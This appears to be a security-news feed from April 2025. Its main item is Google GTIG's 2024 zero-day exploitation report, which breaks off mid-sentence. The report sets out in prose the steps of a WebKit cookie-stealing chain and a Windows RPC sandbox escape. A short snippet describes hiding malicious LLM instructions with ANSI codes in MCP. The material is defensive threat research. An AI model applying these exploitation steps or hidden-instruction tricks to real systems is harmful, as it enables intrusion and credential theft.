https://www.hillstonenet.com/more/company/press-releases/rsac-2025-hillstone-networks-named-market-innovator-for-ai-powered-cybersecurity-solutions/
Newsletter Nacionalnog CERT-a CERT-info #4
2025-04-29T13:25:09Z | 1745933109

Pročitajte novi broj Newslettera Nacionalnog CERT-a. Tema mjeseca: Edukativni sadržaji Nacionalnog CERT-a za škole U travanjskom izdanju newslettera donosimo vam pregled materijala koje smo izradili samostalno ili u suradnji s drugim institucijama, a obuhvaćaju sve – od osnovnih savjeta o sigurnom korištenju interneta, do praktičnih vodiča i radionica koje se mogu koristiti u učionicama. Ispod... The post Newsletter Nacionalnog CERT-a CERT-info #4 first appeared on CERT.hr.

https://www.cert.hr/newsletter-nacionalnog-cert-a-cert-info-4/
Deceiving users with ANSI terminal codes in MCP
2025-04-29T13:00:00Z | 1745931600

This post describes attacks using ANSI terminal code escape sequences to hide malicious instructions to the LLM, leveraging the line jumping vulnerability we discovered in MCP.

https://blog.trailofbits.com/2025/04/29/deceiving-users-with-ansi-terminal-codes-in-mcp/
Akamai Firewall for AI: Get Powerful Protection for New LLM App Threats
2025-04-29T13:00:00Z | 1745931600

Protect against LLM attacks such as prompt injection, exfiltration and extraction, and toxic AI outputs with Akamai Firewall for AI.

https://www.akamai.com/blog/security/2025/apr/protect-against-llm-attacks-with-akamai-firewall-for-ai
Tenable Appoints Eric Doerr as Chief Product Officer
2025-04-29T13:00:00Z | 1745931600

Tenable®, the exposure management company, today announced the appointment of Eric Doerr as Chief Product Officer (CPO). Doerr brings nearly three decades of experience building and scaling security products at some of the world’s most respected technology companies, including Microsoft and, most recently, Google Cloud.At Tenable, Doerr will lead the company’s global product organization, overseeing strategy, innovation and execution across its growing cybersecurity portfolio. His appointment comes at a pivotal moment, as Tenable prepares to launch a significantly expanded version of its Tenable One platform—designed to deliver the most comprehensive exposure management capabilities in the industry. It also coincides with Tenable’s demonstrated momentum in cloud security.“Tenable has a clear and compelling vision for the future of cybersecurity—one that unifies visibility, prioritization and remediation across the modern attack surface,” said Steve Vintz, co-CEO, Tenable. “Eric’s deep expertise in cloud-native security, threat intelligence, and large-scale product innovation makes him the ideal leader to advance our exposure management vision and accelerate our impact across the enterprise.”Doerr most recently served as Vice President of Security Products at Google Cloud, where he led a broad portfolio including Google SecOps (formerly Chronicle) and Google Threat Intelligence, as well as the Mandiant integration. Prior to Google, he spent more than 20 years at Microsoft in senior leadership roles across the security and identity space, including General Manager of Microsoft Account and Corporate Vice President of Cloud Security and the Microsoft Security Response Center (MSRC).“Tenable is transforming how organizations think about and reduce cyber risk,” said Doerr. “Its forward-thinking approach to exposure management and its rapid innovation in cloud security make this an incredibly exciting time to join. I’m thrilled to be part of a team that’s building the future of cybersecurity.”Shai Morag, Tenable’s current CPO, will remain at the company during the transition period. The company thanks Mr. Morag for his leadership and many contributions to Tenable’s product strategy and growth.About TenableTenable® is the exposure management company, exposing and closing the cybersecurity gaps that erode business value, reputation and trust. The company’s AI-powered exposure management platform radically unifies security visibility, insight and action across the attack surface, equipping modern organizations to protect against attacks from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. By protecting enterprises from security exposure, Tenable reduces business risk for approximately 44,000 customers around the globe. Learn more at tenable.com. ### Media Contact:Tenabletenablepr@tenable.comForward-Looking StatementsThis press release includes forward-looking statements within the meaning of the "safe harbor" provisions of the Private Securities Litigation Reform Act of 1995. All statements contained in this press release other than statements of historical fact, including statements regarding the effects of appointing the CPO, future results of operations, and business strategy and plans and objectives for future operations, are forward-looking statements and represent our views as of the date of this press release. The words “anticipate,” "believe,” “continue,” “estimate,” “expect,” “intend,” “may,” “will” and similar expressions are intended to identify forward-looking statements. We have based these forward-looking statements on our current expectations and projections about future events and financial trends that we believe may affect our financial condition, results of operations, business strategy, short-term and long-term business operations and objectives and financial needs. These forward-looking statements are subject to a number of assumptions and risks and uncertainties, many of which involve factors or circumstances that are beyond our control that could affect our financial results. These risks and uncertainties are detailed in the sections titled "Risk Factors" and "Management's Discussion and Analysis of Financial Condition and Results of Operations" in our Annual Report on Form 10-K for the year ended December 31, 2024 as well as other filings that we make from time to time with the SEC, which are available on the SEC's website at sec.gov. Moreover, we operate in a very competitive and rapidly changing environment. New risks emerge from time to time. It is not possible for our management to predict all risks, nor can we assess the impact of all factors on our business or the extent to which any factor, or combination of factors, may cause actual results to differ materially from those contained in any forward-looking statements we may make. In light of these risks, uncertainties and assumptions, the future events and trends discussed in this press release may not occur and actual results could differ materially and adversely from those anticipated or implied in any forward-looking statements. Except as required by law, we are under no obligation to update these forward-looking statements subsequent to the date of this press release, or to update the reasons if actual results differ materially from those anticipated in the forward-looking statements.

https://www.tenable.com/press-releases/tenable-appoints-eric-doerr-as-chief-product-officer
The Digital Europe Programme Work Programme for 2025–2027 has been published
2025-04-29T12:19:08Z | 1745929148

The 2025–2027 Work Programme of the Digital Europe Programme was published at the end of March. A total of EUR 390 million has been allocated to cybersecurity. The upcoming calls will focus, among other things, on the development of new technologies, such as artificial intelligence and quantum-safe algorithms. The first calls will open during 2025.

https://www.kyberturvallisuuskeskus.fi/en/news/digital-europe-programme-work-programme-2025-2027-has-been-published
The Digital Europe Programme Work Programme for 2025–2027 has been published
2025-04-29T12:19:08Z | 1745929148

The 2025–2027 Work Programme of the Digital Europe Programme was published at the end of March. A total of EUR 390 million has been allocated to cybersecurity. The upcoming calls will focus, among other things, on the development of new technologies, such as artificial intelligence and quantum-safe algorithms. The first calls will open during 2025.

https://www.kyberturvallisuuskeskus.fi/en/news/digital-europe-programme-work-programme-2025-2027-has-been-published
Innovation is at the heart of Decathlon's mission
2025-04-29T12:00:00Z | 1745928000

Decathlon, driven by sports and innovation, partners with Cisco Meraki for a scalable network, powering its global presence in 80+ countries.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/innovation-is-at-the-heart-of-decathlon-mission.html
Innovation is at the heart of Decathlon's mission
2025-04-29T12:00:00Z | 1745928000

Decathlon, driven by sports and innovation, partners with Cisco Meraki for a scalable network, powering its global presence in 80+ countries.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/innovation-is-at-the-heart-of-decathlon-mission.html
This month in security with Tony Anscombe – April 2025 edition
2025-04-29T11:43:33Z | 1745927013

From the near-demise of MITRE's CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity

https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-april-2025-edition/
Outlaw cybergang attacking targets worldwide
2025-04-29T10:00:29Z | 1745920829

The Kaspersky Global Emergency Response Team (GERT) detected an Outlaw mining botnet in a customer incident. In this article, we share insights into this botnet's SSH-based infection chain.

https://securelist.com/outlaw-botnet/116444/
Gremlin Stealer: New Stealer on Sale in Underground Forum
2025-04-29T10:00:08Z | 1745920808

Advertised on Telegram, Gremlin Stealer is new malware active since March 2025 written in C#. Data stolen is uploaded to a server for publication. The post Gremlin Stealer: New Stealer on Sale in Underground Forum appeared first on Unit 42.

https://unit42.paloaltonetworks.com/new-malware-gremlin-stealer-for-sale-on-telegram/
Register now for Search Central Live Deep Dive 2025
2025-04-29T10:00:00Z | 1745920800

We're ready to open registrations for the first ever Search Central Live Deep Dive, a 3-day event that will be held in Bangkok, Thailand this year on July 23-25!

https://developers.google.com/search/blog/2025/04/search-central-live-deep-dive-2025
CheckPoint, Zimperium, Lookout… Pradeo is the leading European choice for mobile security
2025-04-29T08:48:07Z | 1745916487

A market historically dominated by American players For over a decade, the mobile cybersecurity market has been largely dominated by American companies, benefiting from massive marketing budgets and strong international visibility.

https://blog.pradeo.com/checkpoint-zimperium-lookout-pradeo-leading-european-choice
No More Black Friday Fire Drills: How Elkjøp Transformed Retail IT with Cato
2025-04-29T07:27:00Z | 1745911620

Black Friday is retail’s biggest moment—and retail IT’s biggest challenge. Spikes in traffic, strained systems, and the constant fear of outages turn what should be a commercial win into an operational war room. For many retailers, it’s a time of sleepless nights, emergency vendor calls, and systems pushed to their breaking point.  But it doesn’t... The post No More Black Friday Fire Drills: How Elkjøp Transformed Retail IT with Cato appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-elkjop-transformed-retail-it-with-cato/
ZDI-CAN-23861: Viessmann
2025-04-29T05:00:00Z | 1745902800

A CVSS score 6.8 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'adhkr - LuwakLab' was reported to the affected vendor on: 2025-04-29, 38 days ago. The vendor is given until 2025-08-27 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis
2025-04-29T05:00:00Z | 1745902800

Written by: Casey Charrier, James Sadowski, Clement Lecigne, Vlad Stolyarov Executive Summary Google Threat Intelligence Group (GTIG) tracked 75 zero-day vulnerabilities exploited in the wild in 2024, a decrease from the number we identified in 2023 (98 vulnerabilities), but still an increase from 2022 (63 vulnerabilities). We divided the reviewed vulnerabilities into two main categories: end-user platforms and products (e.g., mobile devices, operating systems, and browsers) and enterprise-focused technologies, such as security software and appliances.  Vendors continue to drive improvements that make some zero-day exploitation harder, demonstrated by both dwindling numbers across multiple categories and reduced observed attacks against previously popular targets. At the same time, commercial surveillance vendors (CSVs) appear to be increasing their operational security practices, potentially leading to decreased attribution and detection. We see zero-day exploitation targeting a greater number and wider variety of enterprise-specific technologies, although these technologies still remain a smaller proportion of overall exploitation when compared to end-user technologies. While the historic focus on the exploitation of popular end-user technologies and their users continues, the shift toward increased targeting of enterprise-focused products will require a wider and more diverse set of vendors to increase proactive security measures in order to reduce future zero-day exploitation attempts. For a deeper look at the trends discussed in this report, along with recommendations for defenders, register for our upcoming zero-day webinar. Scope  This report describes what Google Threat Intelligence Group (GTIG) knows about zero-day exploitation in 2024. We discuss how targeted vendors and exploited products drive trends that reflect threat actor goals and shifting exploitation approaches, and then closely examine several examples of zero-day exploitation from 2024 that demonstrate how actors use both historic and novel techniques to exploit vulnerabilities in targeted products. The following content leverages original research conducted by GTIG, combined with breach investigation findings and reporting from reliable open sources, though we cannot independently confirm the reports of every source. Research in this space is dynamic and the numbers may adjust due to the ongoing discovery of past incidents through digital forensic investigations. The numbers presented here reflect our best understanding of current data. GTIG defines a zero-day as a vulnerability that was maliciously exploited in the wild before a patch was made publicly available. GTIG acknowledges that the trends observed and discussed in this report are based on detected and disclosed zero-days. Our analysis represents exploitation tracked by GTIG but may not reflect all zero-day exploitation. aside_block ), ('btn_text', 'Download now'), ('href', 'https://services.google.com/fh/files/misc/2024-zero-day-exploitation-analysis-en.pdf'), ('image', None)])]> Key Takeaways Zero-day exploitation continues to grow gradually. The 75 zero-day vulnerabilities exploited in 2024 follow a pattern that has emerged over the past four years. While individual year counts have fluctuated, the average trendline indicates that the rate of zero-day exploitation continues to grow at a slow but steady pace. Enterprise-focused technology targeting continues to expand. GTIG continued to observe an increase in adversary exploitation of enterprise-specific technologies throughout 2024. In 2023, 37% of zero-day vulnerabilities targeted enterprise products. This jumped to 44% in 2024, primarily fueled by the increased exploitation of security and networking software and appliances. Attackers are increasing their focus on security and networking products. Zero-day vulnerabilities in security software and appliances were a high-value target in 2024. We identified 20 security and networking vulnerabilities, which was over 60% of all zero-day exploitation of enterprise technologies. Exploitation of these products, compared to end-user technologies, can more effectively and efficiently lead to extensive system and network compromises, and we anticipate adversaries will continue to increase their focus on these technologies. Vendors are changing the game. Vendor investments in exploit mitigations are having a clear impact on where threat actors are able to find success. We are seeing notable decreases in zero-day exploitation of some historically popular targets such as browsers and mobile operating systems. Actors conducting cyber espionage still lead attributed zero-day exploitation. Between government-backed groups and customers of commercial surveillance vendors (CSVs), actors conducting cyber espionage operations accounted for over 50% of the vulnerabilities we could attribute in 2024. People's Republic of China (PRC)-backed groups exploited five zero-days, and customers of CSVs exploited eight, continuing their collective leading role in zero-day exploitation. For the first year ever, we also attributed the exploitation of the same volume of 2024 zero-days (five) to North Korean actors mixing espionage and financially motivated operations as we did to PRC-backed groups. Looking at the Numbers  GTIG tracked 75 exploited-in-the-wild zero-day vulnerabilities that were disclosed in 2024. This number appears to be consistent with a consolidating upward trend that we have observed over the last four years. After an initial spike in 2021, yearly counts have fluctuated but not returned to the lower numbers we saw in 2021 and prior. While there are multiple factors involved in discovery of zero-day exploitation, we note that continued improvement and ubiquity of detection capabilities along with more frequent public disclosures have both resulted in larger numbers of detected zero-day exploitation compared to what was observed prior to 2021. Figure 1: Zero-days by year Higher than any previous year, 44% (33 vulnerabilities) of tracked 2024 zero-days affected enterprise technologies, continuing the growth and trends we observed last year. The remaining 42 zero-day vulnerabilities targeted end-user technologies. Enterprise Exploitation Expands in 2024 as Browser and Mobile Exploitation Drops End-User Platforms and Products In 2024, 56% (42) of the tracked zero-days targeted end-user platforms and products, which we define as devices and software that individuals use in their day-to-day life, although we acknowledge that enterprises also often use these. All of the vulnerabilities in this category were used to exploit browsers, mobile devices, and desktop operating systems. Zero-day exploitation of browsers and mobile devices fell drastically, decreasing by about a third for browsers and by about half for mobile devices compared to what we observed last year (17 to 11 for browsers, and 17 to 9 for mobile). Chrome was the primary focus of browser zero-day exploitation in 2024, likely reflecting the browser's popularity among billions of users. Exploit chains made up of multiple zero-day vulnerabilities continue to be almost exclusively (~90%) used to target mobile devices. Third-party components continue to be exploited in Android devices, a trend we discussed in last year’s analysis. In 2023, five of the seven zero-days exploited in Android devices were flaws in third-party components. In 2024, three of the seven zero-days exploited in Android were found in third-party components. Third-party components are likely perceived as lucrative targets for exploit development since they can enable attackers to compromise many different makes and models of devices across the Android ecosystem. 2024 saw an increase in the total number of zero-day vulnerabilities affecting desktop operating systems (OSs) (22 in 2024 vs. 17 in 2023), indicating that OSs continue to be a strikingly large target. The proportional increase was even greater, with OS vulnerabilities making up just 17% of total zero-day exploitation in 2023, compared to nearly 30% in 2024.  Microsoft Windows exploitation continued to increase, climbing from 13 zero-days in 2022, to 16 in 2023, to 22 in 2024. As long as Windows remains a popular choice both in homes and professional settings, we expect that it will remain a popular target for both zero-day and n-day (i.e. a vulnerability exploited after its patch has been released) exploitation by threat actors. Figure 2: Zero-days in end-user products in 2023 and 2024 Enterprise Technologies In 2024, GTIG identified the exploitation of 33 zero-days in enterprise software and appliances. We consider enterprise products to include those mainly utilized by businesses or in a business environment. While the absolute number is slightly lower than what we saw in 2023 (36 vulnerabilities), the proportion of enterprise-focused vulnerabilities has risen from 37% in 2023 to 44% in 2024. Twenty of the 33 enterprise-focused zero-days targeted security and network products, a slight increase from the 18 observed in this category for 2023, but a 9% bump when compared proportionally to total zero-days for the year. The variety of targeted enterprise products continues to expand across security and networking products, with notable targets in 2024 including Ivanti Cloud Services Appliance, Palo Alto Networks PAN-OS, Cisco Adaptive Security Appliance, and Ivanti Connect Secure VPN. Security and network tools and devices are designed to connect widespread systems and devices with high permissions required to manage the products and their services, making them highly valuable targets for threat actors seeking efficient access into enterprise networks. Endpoint detection and response (EDR) tools are not usually equipped to work on these products, limiting available capabilities to monitor them. Additionally, exploit chains are not generally required to exploit these systems, giving extensive power to individual vulnerabilities that can single-handedly achieve remote code execution or privilege escalation. Over the last several years, we have also tracked a general increase of enterprise vendors targeted. In 2024, we identified 18 unique enterprise vendors targeted by zero-days. While this number is slightly less than the 22 observed in 2023, it remains higher than all prior years' counts. It is also a stark increase in the proportion of enterprise vendors for the year, given that the 18 unique enterprise vendors were out of 20 total vendors for 2024. 2024's count is still a significant proportional increase compared to the 22 unique enterprise vendors targeted out of a total of 23 in 2023. Figure 3: Number of unique enterprise vendors targeted The proportion of zero-days exploited in enterprise devices in 2024 reinforces a trend that suggests that attackers are intentionally targeting products that can provide expansive access and fewer opportunities for detection. Exploitation by Vendor The vendors affected by multiple 2024 zero-day vulnerabilities generally fell into two categories: big tech (Microsoft, Google, and Apple) and vendors who supply security and network-focused products. As expected, big tech took the top two spots, with Microsoft at 26 and Google at 11. Apple slid to the fourth most frequently exploited vendor this year, with detected exploitation of only five zero-days. Ivanti was third most frequently targeted with seven zero-days, reflecting increased threat actor focus on networking and security products. Ivanti's placement in the top three reflects a new and crucial change, where a security vendor was targeted more frequently than a popular end-user technology-focused vendor. We discuss in a following section how PRC-backed exploitation has focused heavily on security and network technologies, one of the contributing factors to the rise in Ivanti targeting. We note that exploitation is not necessarily reflective of a vendor's security posture or software development processes, as targeted vendors and products depend on threat actor objectives and capabilities. Types of Exploited Vulnerabilities Threat actors continued to utilize zero-day vulnerabilities primarily for the purposes of gaining remote code execution and elevating privileges. In 2024, these consequences accounted for over half (42) of total tracked zero-day exploitation. Three vulnerability types were most frequently exploited. Use-after-free vulnerabilities have maintained their prevalence over many years, with eight in 2024, and are found in a variety of targets including hardware, low-level software, operating systems, and browsers. Command injection (also at eight, including OS command injection) and cross-site scripting (XSS) (six) vulnerabilities were also frequently exploited in 2024. Both code injection and command injection vulnerabilities were observed almost entirely targeting networking and security software and appliances, displaying the intent to use these vulnerabilities in order to gain control over larger systems and networks. The XSS vulnerabilities were used to target a variety of products, including mail servers, enterprise software, browsers, and an OS. All three of these vulnerability types stem from software development errors and require meeting higher programming standards in order to prevent them from occurring. Safe and preventative coding practices, including, but not limited to code reviews, updating legacy codebases, and utilizing up-to-date libraries, can appear to hinder production timelines. However, patches prove the potential for these security exposures to be prevented in the first place with proper intention and effort and ultimately reduce the overall effort to properly maintain a product or codebase. Who Is Driving Exploitation Figure 4: 2024 attributed zero-day exploitation Due to the stealthy access zero-day vulnerabilities can provide into victim systems and networks, they continue to be a highly sought after capability for threat actors. GTIG tracked a variety of threat actors exploiting zero-days in a variety of products in 2024, which is consistent with our previous observations that zero-day exploitation has diversified in both platforms targeted and actors exploiting them. We attributed the exploitation of 34 zero-day vulnerabilities in 2024, just under half of the total 75 we identified in 2024. While the proportion of exploitation that we could attribute to a threat actor dipped slightly from our analysis of zero-days in 2023, it is still significantly higher than the ~30% we attributed in 2022. While this reinforces our previous observation that platforms' investment in exploit mitigations are making zero-days harder to exploit, the security community is also slowly improving our ability to identify that activity and attribute it to threat actors. Consistent with trends observed in previous years, we attributed the highest volume of zero-day exploitation to traditional espionage actors, nearly 53% (18 vulnerabilities) of total attributed exploitation. Of these 18, we attributed the exploitation of 10 zero-days to likely nation-state-sponsored threat groups and eight to CSVs. CSVs Continue to Increase Access to Zero-Day Exploitation While we still expect government-backed actors to continue their historic role as major players in zero-day exploitation, CSVs now contribute a significant volume of zero-day exploitation. Although the total count and proportion of zero-days attributed to CSVs declined from 2023 to 2024, likely in part due to their increased emphasis on operational security practices, the 2024 count is still substantially higher than the count from 2022 and years prior. Their role further demonstrates the expansion of the landscape and the increased access to zero-day exploitation that these vendors now provide other actors. In 2024, we observed multiple exploitation chains using zero-days developed by forensic vendors that required physical access to a device (CVE-2024-53104, CVE-2024-32896, CVE-2024-29745, CVE-2024-29748). These bugs allow attackers to unlock the targeted mobile device with custom malicious USB devices. For instance, GTIG and Amnesty International's Security Lab discovered and reported on CVE-2024-53104 in exploit chains developed by forensic company Cellebrite and used against the Android phone of a Serbian student and activist by Serbian security services. GTIG worked with Android to patch these vulnerabilities in the February 2025 Android security bulletin.  PRC-Backed Exploitation Remains Persistent PRC threat groups remained the most consistent government-backed espionage developer and user of zero-days in 2024. We attributed nearly 30% (five vulnerabilities) of traditional espionage zero-day exploitation to PRC groups, including the exploitation of zero-day vulnerabilities in Ivanti appliances by UNC5221 (CVE-2023-46805 and CVE-2024-21887), which GTIG reported on extensively. During this campaign, UNC5221 chained multiple zero-day vulnerabilities together, highlighting these actors' willingness to expend resources to achieve their apparent objectives. The exploitation of five vulnerabilities that we attributed to PRC groups exclusively focused on security and networking technologies. This continues a trend that we have observed from PRC groups for several years across all their operations, not just in zero-day exploitation. North Korean Actors Mix Financially Motivated and Espionage Zero-Day Exploitation For the first time since we began tracking zero-day exploitation in 2012, in 2024, North Korean state actors tied for the highest total number of attributed zero-days exploited (five vulnerabilities) with PRC-backed groups. North Korean groups are notorious for their overlaps in targeting scope; tactics, techniques, and procedures (TTPs); and tooling that demonstrate how various intrusion sets support the operations of other activity clusters and mix traditional espionage operations with attempts to fund the regime. This focus on zero-day exploitation in 2024 marks a significant increase in these actors' focus on this capability. North Korean threat actors exploited two zero-day vulnerabilities in Chrome as well as three vulnerabilities in Windows products. In October 2024, it was publicly reported that APT37 exploited a zero-day vulnerability in Microsoft products. The threat actors reportedly compromised an advertiser to serve malicious advertisements to South Korean users that would trigger zero-click execution of CVE-2024-38178 to deliver malware. Although we have not yet corroborated the group's exploitation of CVE-2024-38178 as reported, we have observed APT37 previously exploit Internet Explorer zero-days to enable malware distribution. North Korean threat actors also reportedly exploited a zero-day vulnerability in the Windows AppLocker driver (CVE-2024-21338) in order to gain kernel-level access and turn off security tools. This technique abuses legitimate and trusted but vulnerable already-installed drivers to bypass kernel-level protections and provides threat actors an effective means to bypass and mitigate EDR systems. Non-State Exploitation In 2024, we linked almost 15% (five vulnerabilities) of attributed zero-days to non-state financially motivated groups, including a suspected FIN11 cluster's exploitation of a zero-day vulnerability in multiple Cleo managed file transfer products (CVE-2024-55956) to conduct data theft extortion. This marks the third year of the last four (2021, 2023, and 2024) in which FIN11 or an associated cluster has exploited a zero-day vulnerability in its operations, almost exclusively in file transfer products. Despite the otherwise varied cast of financially motivated threat actors exploiting zero-days, FIN11 has consistently dedicated the resources and demonstrated the expertise to identify, or acquire, and exploit these vulnerabilities from multiple different vendors. We attributed an additional two zero-days in 2024 to non-state groups with mixed motivations, conducting financially motivated activity in some operations but espionage in others. Two vulnerabilities (CVE-2024-9680 and CVE-2024-49039, detailed in the next section) were exploited as zero-days by CIGAR (also tracked as UNC4895 or publicly reported as RomCom), a group that has conducted financially motivated operations alongside espionage likely on behalf of the Russian government, based partly on observed highly specific targeting focused on Ukrainian and European government and defense organizations. A Zero-Day Spotlight on CVE-2024-44308, CVE-2024-44309, and CVE-2024-49039: A look into zero-days discovered by GTIG researchers Spotlight #1: Stealing Cookies with Webkit On Nov. 12, 2024, GTIG detected a potentially malicious piece of JavaScript code injected on https://online.da.mfa.gov[.]ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4. The JavaScript was loaded directly from the main page of the website of the Diplomatic Academy of Ukraine, online.da.mfa.gov.ua. Upon further analysis, we discovered that the JavaScript code was a WebKit exploit chain specifically targeting MacOS users running on Intel hardware. The exploit consisted of a WebKit remote code execution (RCE) vulnerability (CVE-2024-44308), leveraging a logical Just-In-Time (JIT) error, succeeded by a data isolation bypass (CVE-2024-44309). The RCE vulnerability employed simple and old JavaScriptCore exploitation techniques that are publicly documented, namely: Setting up addrof/fakeobj primitives using the vulnerability Leaking StructureID Building a fake TypedArray to gain arbitrary read/write JIT compiling a function to get a RWX memory mapping where a shellcode can be written and executed The shellcode traversed a set of pointers and vtables to find and call WebCookieJar::cookieRequestHeaderFieldValue with an empty firstPartyForCookies parameter, allowing the threat actor to access cookies of any arbitrary website passed as the third parameter to cookieRequestHeaderFieldValue. The end goal of the exploit is to collect users' cookies in order to access login.microsoftonline.com. The cookie values were directly appended in a GET request sent to https://online.da.mfa.gov.ua/gotcookie?. This is not the first time we have seen threat actors stay within the browser to collect users' credentials. In March 2021, a targeted campaign used a zero-day against WebKit on iOS to turn off Same-Origin-Policy protections in order to collect authentication cookies from several popular websites. In August 2024, a watering hole on various Mongolian websites used Chrome and Safari n-day exploits to exfiltrate users’ credentials. While it is unclear why this abbreviated approach was taken as opposed to deploying full-chain exploits, we identified several possibilities, including: The threat actor was not able to get all the pieces to have a full chain exploit. In this case, the exploit likely targeted only the MacIntel platform because they did not have a Pointer Authentication Code (PAC) bypass to target users using Apple Silicon devices. A PAC bypass is required to make arbitrary calls for their data isolation bypass. The price for a full chain exploit was too expensive, especially when the chain is meant to be used at a relatively large scale. This especially includes watering hole attacks, where the chances of being detected are high and subsequently might quickly burn the zero-day vulnerability and exploit. Stealing credentials is sufficient for their operations and the information they want to collect. This trend is also observed beyond the browser environment, wherein third-party mobile applications (e.g., messaging applications) are targeted, and threat actors are stealing the information only accessible within the targeted application. Spotlight #2: CIGAR Local Privilege Escalations CIGAR's Browser Exploit Chain In early October 2024, GTIG independently discovered a fully weaponized exploit chain for Firefox and Tor browsers employed by CIGAR. CIGAR is a dual financial- and espionage-motivated threat group assessed to be running both types of campaigns in parallel, often simultaneously. In 2023, we observed CIGAR utilizing an exploit chain in Microsoft Office (CVE-2023-36884) as part of an espionage campaign targeting attendees of the Ukrainian World Congress and NATO Summit; however, in an October 2024 campaign, the usage of the Firefox exploit appears to be more in line with the group's financial motives. Our analysis, which broadly matched ESET's findings, indicated that the browser RCE used is a use-after-free vulnerability in the Animation timeline. The vulnerability, known as CVE-2024-9680, was an n-day at the time of discovery by GTIG. Upon further analysis, we identified that the embedded sandbox escape, which was also used as a local privilege escalation to NT/SYSTEM, was exploiting a newfound vulnerability. We reported this vulnerability to Mozilla and Microsoft, and it was later assigned CVE-2024-49039. Double-Down on Privilege Escalation: from Low Integrity to SYSTEM Firefox uses security sandboxing to introduce an additional security boundary and mitigate the effects of malicious code achieving code execution in content processes. Therefore, to achieve code execution on the host, an additional sandbox escape is required. The in-the-wild CVE-2024-49039 exploit, which contained the PDB string C:\etalon\PocLowIL\@Output\PocLowIL.pdb, could achieve both a sandbox escape and privilege escalation. The exploit abused two distinct issues to escalate privileges from Low Integrity Level (IL) to SYSTEM: the first allowed it to access the WPTaskScheduler RPC Interface (UUID: {33d84484-3626-47ee-8c6f-e7e98b113be1}), normally not accessible from a sandbox Firefox content process via the "less-secure endpoint" ubpmtaskhostchannel created in ubpm.dll; the second stems from insufficient Access Control List (ACL) checks in WPTaskScheduler.dll RPC server, which allowed an unprivileged user to create and execute scheduled tasks as SYSTEM. As detailed in "How to secure a Windows RPC Server, and how not to.," there are three ways to secure an RPC server, and all three were utilized in WPTaskScheduler: 1. Securing the endpoint: In WPTaskScheduler::TsiRegisterRPCInterface, the third argument to RpcServerUseProtseq is a non-NULL security descriptor (SD). This SD should prevent the Firefox "Content" process from accessing the WPTaskScheduler RPC endpoint. However, a lesser known "feature" of RPC is that RPC endpoints are multiplexed, meaning that if there is a less secure endpoint in the same process, it is possible to access an interface indirectly from another endpoint (with a more permissive ACL). This is what the exploit does: instead of accessing RPC using the ALPC port that the WPTaskScheduler.dll sets up, it resolves the interface indirectly via upbmtaskhostchannel. ubpm.dll uses a NULL security descriptor when initializing the interface, instead relying on the UbpmpTaskHostChannelInterfaceSecurityCb callback for ACL checks: Figure 5: NULL security descriptor used when creating "ubpmtaskhostchannel" RPC endpoint in ubpm.dll::UbpmEnableTaskHostChannelRpcInterface, exposing a less secure endpoint for WPTaskScheduler interface 2. Securing the interface: In the same WPTaskScheduler::TsiRegisterRPCInterface function, an overly permissive security descriptor was used as an argument to RpcServerRegisterIf3. As we can see on the listing below, the CVE-2024-49039 patch addressed this by introducing a more locked-down SD. Figure 6: Patched WPTaskScheduler.dll introduces a more restrictive security descriptor when registering an RPC interface 3. Ad-hoc Security: Implemented in WPTaskScheduler.dll::CallerHasAccess and called prior to enabling or executing any scheduled task. The function performs checks on whether the calling user is attempting to execute a task created by them or one they should be able to access but does not perform any additional checks to prevent calls originating from an unprivileged user. CVE-2024-49039 addresses the issue by applying a more restrictive ACL to the interface; however, the issue with the less secure endpoint described in "1. Securing the endpoint" remains, and a restricted token process is still able to access the endpoint. Unidentified Actor Using the Same Exploits In addition to CIGAR, we discovered another, likely financially motivated, group using the exact same exploits (albeit with a different payload) while CVE-2024-49039 was still a zero-day. This actor utilized a watering hole on a legitimate, compromised cryptocurrency news website redirecting to an attacker-controlled domain hosting the same CVE-2024-9680 and CVE-2024-49039 exploit. Outlook and Implications Defending against zero-day exploitation continues to be a race of strategy and prioritization. Not only are zero-day vulnerabilities becoming easier to procure, but attackers finding use in new types of technology may strain less experienced vendors. While organizations have historically been left to prioritize patching processes based on personal or organizational threats and attack surfaces, broader trends can inform a more specific approach alongside lessons learned from major vendors' mitigation efforts. We expect zero-day vulnerabilities to maintain their allure to threat actors as opportunities for stealth, persistence, and detection evasion. While we observed trends regarding improved vendor security posture and decreasing numbers around certain historically popular products—particularly mobile and browsers—we anticipate that zero-day exploitation will continue to rise steadily. Given the ubiquity of operating systems and browsers in daily use, big tech vendors are consistently high-interest targets, and we expect this to continue. Phones and browsers will almost certainly remain popular targets, although enterprise software and appliances will likely see a continued rise in zero-day exploitation. Big tech companies have been victims of zero-day exploitation before and will continue to be targeted. This experience, in addition to the resources required to build more secure products and detect vulnerabilities in responsible manners, permits larger companies to approach zero-days as a more manageable problem. For newly targeted vendors and those with products in the growing prevalence of targeted enterprise products, security practices and procedures should evolve to consider how successful exploitation of these products could bypass typical protection mechanisms. Preventing successful exploitation will rely heavily on these vendors' abilities to enforce proper and safe coding practices. We continue to see the same types of vulnerabilities exploited over time, indicating patterns in what weaknesses attackers seek out and find most beneficial to exploit. Continued existence and exploitation of similar issues makes zero-days easier; threat actors know what to look for and where exploitable weaknesses are most pervasive. Vendors should account for this shift in threat activity and address gaps in configurations and architectural decisions that could permit exploitation of a single product to cause irreparable damage. This is especially true for highly valuable tools with administrator access and/or widespread reach across systems and networks. Best practices continue to represent a minimum threshold of what security standards an architecture should demonstrate, including zero-trust fundamentals such as least-privilege access and network segmentation. Continuous monitoring should occur where possible in order to restrict and end unauthorized access as swiftly as possible, and vendors will need to account for EDR capabilities for technologies that currently lack them (e.g., many security and networking products). GTIG recommends acute threat surface awareness and respective due diligence in order to defend against today's zero-day threat landscape. Zero-day exploitation will ultimately be dictated by vendors' decisions and 